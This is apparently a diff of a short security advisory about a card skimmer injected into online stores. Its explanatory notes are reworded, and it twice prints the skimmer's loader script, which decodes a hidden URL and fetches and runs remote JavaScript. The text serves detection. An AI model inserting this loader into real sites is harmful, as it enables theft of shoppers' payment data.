 <script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

-Note: The aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz part changes each time, but the code structure remains the same, and the atob() function is always used.
-There may be code before or after (the skimmer tries to disguise itself by being slightly different on each store).
+Note: The part aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz changes each time, but the structure of the code remains the same, and the atob() function is always used.
+Code may be present before or after (the skimmer tries to hide itself by being slightly different on each store).

 <script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>